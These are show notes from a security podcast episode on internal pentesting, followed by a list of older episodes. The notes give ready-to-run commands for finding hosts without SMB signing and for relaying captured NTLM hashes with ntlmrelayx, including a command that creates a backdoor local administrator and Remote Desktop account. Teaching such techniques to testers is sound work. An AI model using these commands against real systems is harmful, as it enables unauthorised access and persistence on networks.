7MS #372: Tales of Internal Pentest Pwnage - Part 5
7 Minute Security15 Heinä 2019

7MS #372: Tales of Internal Pentest Pwnage - Part 5

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

  • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

  • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

Check today's show notes at https://7ms.us for more information!

Jaksot(720)

7MS #263: Make Nessus Reporting Fun Again!

7MS #263: Make Nessus Reporting Fun Again!

Tell me I can't be the only one who regularly wants to combine a bunch of small Nessus scans files into a big fat Nessus scan file, and then make pretty pictures/graphs/summaries that the customer can...

25 Kesä 201713min

7MS #262: Speaking at ILTACON

7MS #262: Speaking at ILTACON

Through kind of a weird series of events, I have an opportunity to speak at ILTACON this summer in Vegas (baby!). I'll be talking about some things you can do if you suspect your perimeter is breached...

14 Kesä 201710min

7MS #261: Blind Network Security Assessments

7MS #261: Blind Network Security Assessments

This week I had the fun opportunity to do a "blind" network security assessment - where basically we had to step into a network we'd never seen before and make some security posture recommendations. I...

7 Kesä 201710min

7MS #260: PwnPro 101 - Part 2

7MS #260: PwnPro 101 - Part 2

I'm continuing to love the our PwnPro and had a chance to use it on a customer assessment this week. For the most part the setup/install was a breeze. Just had a few hiccups that the Pwnie support tea...

2 Kesä 201712min

7MS #259: OFF-TOPIC - Home Robbery Attribution

7MS #259: OFF-TOPIC - Home Robbery Attribution

Warning! Warning! This is an off-topic episode! I try really hard to create valuable weekly content about IT/security. However, sometimes a virtual grenade goes off in my life and prevents me from hav...

25 Touko 20179min

7MS #258: Speaking at Secure360 - Part 2

7MS #258: Speaking at Secure360 - Part 2

Intro I mentioned last week that I was speaking at the Secure360 conference here in the Twin Cities, and at that time I was preparing a talk called Pentesting 101: No Hoodie Required. I was so nervous...

18 Touko 201714min

7MS #257: Speaking at Secure360

7MS #257: Speaking at Secure360

The nervous butterflies are chewing up my organs this week. Why? Because I'm speaking at Secure360 next Tuesday and Wednesday. I'm trying to build a presentation that: Appeals to both techie nerds l...

11 Touko 201711min

7MS #256: AlienVault Certified System Engineer - Part 2

7MS #256: AlienVault Certified System Engineer - Part 2

So a few weeks ago I did an episode about the AlienVault Certified Security Engineer certification, and last Friday I took a stab at the test. I failed. It kicked my butt. Today I'm here to both rant ...

4 Touko 201711min

Suosittua kategoriassa Politiikka ja uutiset

uutiscast
aikalisa
politiikan-puskaradio
rss-ootsa-kuullut-tasta
ootsa-kuullut-tasta-2
tervo-halme
rss-podme-livebox
rss-pinnalla
rss-ulkopoditiikkaa
aihe
the-ulkopolitist
viisupodi
otetaan-yhdet
et-sa-noin-voi-sanoo-esittaa
rss-vaalirankkurit-podcast
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
rss-asiastudio
rss-kaikki-uusiksi
rss-toisten-taskuilla
rss-girls-finish-f1rst